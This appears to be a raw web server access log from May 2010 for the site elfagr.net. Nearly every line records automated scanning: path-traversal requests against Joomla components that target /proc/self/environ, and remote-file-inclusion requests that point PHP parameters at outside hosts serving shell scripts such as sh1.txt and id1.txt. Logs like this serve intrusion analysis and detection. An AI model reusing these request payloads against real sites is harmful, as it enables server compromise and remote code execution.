174.133.197.114 - - [06/May/2010:21:07:17 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:07:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
205.234.252.102 - - [06/May/2010:21:12:18 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:21:12:26 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
205.234.252.102 - - [06/May/2010:21:12:26 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:06 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:06 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:07 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:24 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
67.228.16.228 - - [06/May/2010:21:16:24 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "elfagr.net"
93.158.149.32 - - [06/May/2010:21:19:53 -0700] "GET /logs/access_100218.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
91.191.173.120 - - [06/May/2010:21:45:55 -0700] "GET /index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:50:49 -0700] "GET /logs/access.log/index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:50:50 -0700] "GET /index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:50:58 -0700] "GET /logs/index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
99.39.2.249 - - [06/May/2010:21:57:17 -0700] "GET /logs///playlist.php?%20phpbb_root_path=http://shiro21.fileave.com/sh1.txt%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:21:57:17 -0700] "GET /logs/access.log///playlist.php?%20phpbb_root_path=http://shiro21.fileave.com/sh1.txt%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:21:57:17 -0700] "GET //playlist.php?%20phpbb_root_path=http://shiro21.fileave.com/sh1.txt%20%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:59:12 -0700] "GET /logs/access.log/index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:59:12 -0700] "GET /index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.191.173.120 - - [06/May/2010:21:59:12 -0700] "GET /logs/index.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
93.158.149.32 - - [06/May/2010:22:10:59 -0700] "GET /logs/access_091112.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
207.44.228.84 - - [06/May/2010:22:12:24 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apatar.com/css/dialog.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
207.44.228.84 - - [06/May/2010:22:12:17 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apatar.com/css/dialog.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
207.44.228.84 - - [06/May/2010:22:12:19 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apatar.com/css/dialog.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
207.44.228.84 - - [06/May/2010:22:14:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apatar.com/css/dialog.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:15:08 -0700] "GET /logs/access.log/errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:15:00 -0700] "GET /logs/errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:15:09 -0700] "GET /errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:18:21 -0700] "GET /logs/access.log/errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:18:23 -0700] "GET /errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
99.39.2.249 - - [06/May/2010:22:18:23 -0700] "GET /logs/errors.php?error=http://42art.com/bbs/skin/ggambo_bogal/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
92.241.190.214 - - [06/May/2010:22:18:50 -0700] "GET /logs/access.log/errors.php?error=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
92.241.190.214 - - [06/May/2010:22:18:58 -0700] "GET /errors.php?error=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
92.241.190.214 - - [06/May/2010:22:18:58 -0700] "GET /logs/errors.php?error=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.88.218 - - [06/May/2010:22:21:56 -0700] "GET /*.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
207.44.228.84 - - [06/May/2010:22:22:57 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.apatar.com/css/dialog.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:24:29 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:24:21 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:24:21 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
111.89.128.186 - - [06/May/2010:22:24:36 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
111.89.128.186 - - [06/May/2010:22:24:45 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:08 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:00 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
92.241.190.214 - - [06/May/2010:22:25:24 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.ycrg.org/inits/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:51 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:59 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:59 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:26:01 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:22:25:53 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.88.218 - - [06/May/2010:22:26:47 -0700] "GET /logs/access.log/*.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "elfagr.net"
74.54.88.218 - - [06/May/2010:22:26:56 -0700] "GET /*.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
74.54.88.218 - - [06/May/2010:22:26:47 -0700] "GET /logs/*.php?option=com_pcchess&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
208.80.193.29 - - [06/May/2010:22:27:38 -0700] "GET / HTTP/1.0" 200 1449 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR Enabled; SIMBAR={5FB8C435-91A7-4d3f-A959-79C43F1D298F}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:27 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:28 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:28 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:52 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:44 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:44 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:46 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:46 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:46 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:56 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:47 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:48 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:29:59 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:08 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:00 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:04 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:05 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:05 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:22 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:22 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:22 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:23 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:32 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:24 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:26 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:35 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:27 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:38 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:38 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:30 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:35 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:35 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:35 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:42 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:42 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:30:51 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:15 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:07 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:07 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:11 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:12 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:12 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:23 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:23 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:15 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:32 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:41 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:32 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
91.121.201.218 - - [06/May/2010:22:31:52 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
